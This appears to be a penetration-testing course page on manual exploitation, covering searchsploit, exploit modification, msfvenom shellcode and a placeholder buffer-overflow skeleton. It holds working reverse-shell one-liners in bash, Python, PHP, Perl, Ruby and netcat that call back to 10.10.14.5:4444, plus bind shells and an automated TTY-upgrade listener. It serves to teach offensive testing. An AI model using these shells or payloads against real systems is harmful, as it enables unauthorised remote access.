Manual Exploitation Techniques

Intermediate | 35 min | Writeup

Exploiting services without frameworks

Learning Objectives

  • Find and modify public exploits
  • Understand exploit code
  • Compile and run exploits
  • Debug failed exploits

While Metasploit is powerful, understanding manual exploitation is essential. You will encounter situations where no Metasploit module exists, or where a public exploit needs modification before it works against your target.

Manual exploitation deepens your understanding of how attacks actually work. The OSCP exam requires demonstrating manual exploitation skills!

Finding Exploits

```bash
# SearchSploit - local copy of the Exploit-DB database
searchsploit apache 2.4.49
searchsploit -x 50383          # Examine the exploit source before you run it
searchsploit -m 50383          # Mirror (copy) it to the current directory

# Exploit-DB website
# https://www.exploit-db.com

# GitHub - often has PoC exploits
# Search: "CVE-2021-XXXX exploit"
# Search: "service version exploit"

# Packet Storm Security
# https://packetstormsecurity.com

# Organize your findings (-m copies into the current directory,
# so change into the target folder first; searchsploit has no output-dir flag)
mkdir exploits
cd exploits && searchsploit -m 50383
```

Modifying Exploits

```bash
# Common modifications needed:
# Read the whole exploit first: hardcoded offsets, return addresses and
# paths are specific to the author's target build and may need re-deriving.

# 1. Change target IP and port
# Look for variables like:
RHOST = "10.10.10.10"
RPORT = 80

# 2. Change shell callback IP (your IP)
LHOST = "10.10.14.5"
LPORT = 4444

# 3. Update shellcode
# Generate with msfvenom; -b excludes bad characters the target would mangle:
msfvenom -p linux/x64/shell_reverse_tcp \
    LHOST=10.10.14.5 LPORT=4444 -f py -b "\x00"

# 4. Fix syntax for Python version
# Python 2 to 3 common issues:
print "text"          # Python 2
print("text")         # Python 3

raw_input()           # Python 2
input()               # Python 3

# 5. Update library imports
import urllib2            # Python 2
import urllib.request     # Python 3
```
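The modifications above are easier to make safely when the target, callback and shellcode live in one place and the payload is checked before it is sent. The following skeleton is an added example, not code from the original page or from any real exploit: the service, offset, return address and shellcode bytes are constructed placeholders for illustration, and the bad-character check is the step most often skipped when a downloaded PoC is adapted in a hurry.

```python
#!/usr/bin/env python3
"""Added example: skeleton for adapting a public exploit.

Target, callback and shellcode are isolated, and the shellcode is checked for
bad characters before anything is sent. OFFSET, RET_ADDR and SHELLCODE are
constructed placeholders, not values for any real vulnerability.
"""
import socket
import struct

# 1. Target and callback settings (the values a downloaded PoC hardcodes).
RHOST, RPORT = "10.10.10.10", 9999
LHOST, LPORT = "10.10.14.5", 4444

# 2. Shellcode: paste the msfvenom output here. This stand-in is NOT real
#    shellcode; it deliberately contains a NUL byte so the check below fires.
SHELLCODE = b"\x48\x31\xc0\x00\x90\xcc"

# 3. Memory layout: hypothetical values; in a real exploit they come from the
#    PoC or from your own debugging and are specific to the target build.
OFFSET = 1024                    # bytes until the saved return address
RET_ADDR = 0x080414C3            # hypothetical address of a jmp-esp style gadget
BAD_CHARS = {0x00, 0x0A, 0x0D}   # bytes the target's parser would mangle


def find_bad_chars(shellcode: bytes, bad: set) -> list:
    """Return (offset, byte) pairs for every bad character in the shellcode."""
    return [(i, b) for i, b in enumerate(shellcode) if b in bad]


def build_payload(shellcode: bytes, offset: int, ret_addr: int, nop_len: int = 16) -> bytes:
    """Assemble padding + little-endian return address + NOP sled + shellcode.

    Refuses to build if the shellcode or the packed address contains a bad
    character; the fix is to regenerate with msfvenom -b or pick another gadget.
    """
    bad = find_bad_chars(shellcode, BAD_CHARS)
    if bad:
        raise ValueError(f"shellcode contains bad chars at {bad}; regenerate with msfvenom -b")
    ret = struct.pack("<I", ret_addr)
    if find_bad_chars(ret, BAD_CHARS):
        raise ValueError("return address contains a bad char; choose another gadget")
    return b"A" * offset + ret + b"\x90" * nop_len + shellcode


def send_payload(payload: bytes, host: str = RHOST, port: int = RPORT, dry_run: bool = True) -> int:
    """Deliver the payload over TCP. dry_run (the default) only reports the size."""
    if dry_run:
        return len(payload)
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(payload + b"\r\n")
    return len(payload)


if __name__ == "__main__":
    print("bad chars in shellcode:", find_bad_chars(SHELLCODE, BAD_CHARS))
    # Stand-in for regenerating the shellcode with -b "\x00":
    clean = SHELLCODE.replace(b"\x00", b"")
    print("dry-run payload bytes:", send_payload(build_payload(clean, OFFSET, RET_ADDR)))
```

Run it as-is to see the check catch the NUL byte; set `dry_run=False` only once the placeholders have been replaced with values for your target.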

Netcat Shells

```bash
# Netcat listener (your machine)
nc -lvnp 4444
# or with rlwrap for command history and line editing
rlwrap nc -lvnp 4444

# Netcat reverse shell (target)
# -e needs nc.traditional or ncat; the OpenBSD netcat on most distros lacks it
nc -e /bin/bash 10.10.14.5 4444
# If -e not available:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.5 4444 > /tmp/f

# Netcat bind shell (target)
nc -lvnp 4444 -e /bin/bash
# Connect from attacker:
nc 10.10.10.10 4444

# Transfer files with netcat
# Sender:
nc -lvnp 4444 < file.txt
# Receiver:
nc 10.10.10.10 4444 > file.txt
# Compare sha256sum on both ends: netcat gives no transfer integrity check
```

Reverse Shells

```bash
# Bash
bash -i >& /dev/tcp/10.10.14.5/4444 0>&1
bash -c 'bash -i >& /dev/tcp/10.10.14.5/4444 0>&1'

# Python
python -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# Python 3
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("10.10.14.5",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

# PHP
php -r '$s=fsockopen("10.10.14.5",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

# Perl
perl -e 'use Socket;$i="10.10.14.5";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));connect(S,sockaddr_in($p,inet_aton($i)));open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");'

# Ruby
ruby -rsocket -e 'f=TCPSocket.open("10.10.14.5",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
```

Shell Upgrade

```bash
# Upgrade dumb shell to interactive TTY

# Python (run in the remote shell)
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Background and configure your local terminal
# Press Ctrl+Z
stty raw -echo; fg
# Press Enter twice

# Set terminal type (in the remote shell)
export TERM=xterm

# Get terminal size on your machine
stty size
# Apply it in the remote shell
stty rows 40 cols 160

# Alternative: script
script /dev/null -c bash
```
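The manual sequence above has two halves: commands sent to the target (pty.spawn, TERM, stty rows/cols) and one change on your own side (`stty raw -echo`, which stops the local terminal from interpreting Ctrl+C and echoing keystrokes so the remote pty can). The listener below is an added example, not part of the original page, that performs both halves automatically on connect. Port and TERM value are example settings; it requires a Unix-like attacker box because it uses termios.

```python
#!/usr/bin/env python3
"""Added example: a reverse shell listener that performs the TTY upgrade
sequence automatically. Port and TERM are example settings. Unix-only."""
import os
import select
import shutil
import socket
import sys
import termios
import time
import tty

LPORT = 4444
TERM = "xterm"


def upgrade_commands(rows: int, cols: int, term: str = TERM) -> list:
    """The commands the page runs by hand, in the order they must be sent.
    pty.spawn goes first: TERM and stty only take effect once a pty exists.
    Falls back through python3, python and script if one is missing."""
    return [
        "python3 -c 'import pty; pty.spawn(\"/bin/bash\")' || "
        "python -c 'import pty; pty.spawn(\"/bin/bash\")' || script /dev/null -c bash",
        f"export TERM={term}",
        f"stty rows {rows} cols {cols}",
    ]


def local_size() -> tuple:
    """Equivalent of running 'stty size' on your machine: (rows, cols)."""
    size = shutil.get_terminal_size(fallback=(160, 40))
    return size.lines, size.columns


def relay(conn: socket.socket) -> None:
    """Forward bytes both ways until either side closes."""
    while True:
        ready, _, _ = select.select([conn, sys.stdin], [], [])
        if conn in ready:
            data = conn.recv(4096)
            if not data:
                return
            os.write(sys.stdout.fileno(), data)
        if sys.stdin in ready:
            data = os.read(sys.stdin.fileno(), 4096)
            if not data:
                return
            conn.sendall(data)


def serve(port: int = LPORT) -> None:
    """Listen, send the upgrade commands, then go raw and relay (like stty raw -echo; fg)."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("0.0.0.0", port))
    srv.listen(1)
    print(f"[*] listening on 0.0.0.0:{port}", file=sys.stderr)
    conn, addr = srv.accept()
    print(f"[*] connection from {addr[0]}:{addr[1]}", file=sys.stderr)
    rows, cols = local_size()
    for cmd in upgrade_commands(rows, cols):
        conn.sendall(cmd.encode() + b"\n")
        time.sleep(0.5)  # give the remote shell time to spawn the pty before stty runs
    # Raw mode locally: the terminal stops handling Ctrl+C/Ctrl+Z and echo itself,
    # so the remote pty does both. Always restore the saved settings on exit.
    fd = sys.stdin.fileno()
    saved = termios.tcgetattr(fd)
    try:
        tty.setraw(fd)
        relay(conn)
    finally:
        termios.tcsetattr(fd, termios.TCSADRAIN, saved)
        conn.close()
        srv.close()


if __name__ == "__main__":
    serve(int(sys.argv[1]) if len(sys.argv) > 1 else LPORT)
```

Run it in place of `nc -lvnp 4444`; if the terminal is left garbled after a disconnect, the usual `reset` restores it, the same as after a manual `stty raw -echo` session.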

Knowledge Check


What command upgrades a basic shell to interactive?

Key Takeaways

  • SearchSploit is your local exploit database - use it first
  • Most exploits need modification - change IPs, ports, shellcode
  • Always upgrade shells for better interaction
  • Know multiple reverse shell methods - some will be blocked
  • rlwrap nc -lvnp gives you a better listener experience